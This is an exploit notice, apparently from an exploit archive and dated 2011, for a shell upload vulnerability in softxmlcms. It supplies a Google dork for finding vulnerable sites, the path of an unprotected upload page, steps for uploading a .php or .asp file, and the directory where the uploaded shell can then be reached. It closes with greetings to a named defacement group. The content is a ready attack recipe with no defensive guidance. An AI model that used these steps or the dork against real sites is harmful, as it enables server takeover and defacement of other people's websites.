###########################################################################
 
Exploit Title : softxmlcms  Shell Upload Vulnerability
 
Google Dork : Powered by softxmlcms
 
Date : 2011-04-15
 
Author : *Alexander*
 
Software Link : http://www.softxml.com
 
Test On : Windows/asp/php
 
CVE : Web Applications
 
###########################################################################
 
===[ Exploit ]=== 
 
http://server/[patch]/XMLEditor2.0/uploadfile1.asp
 
Select the Choose File And Then Browse File.php  Or File.asp
 
===[ Upload To ]===
 
http://server/[patch]/images/File.php
 
Or
 
http://server/[patch]/images/File.asp
 
===[ Demo ]===
 
http://server/softxmlcms/XMLEditor2.0/uploadfile1.asp
 
###########################################################################
 
Greetz : http://Ashiyane.org/Forums
 
Behrooz_Ice , Q7X , Virangar , Black And All Ashiyane Defacers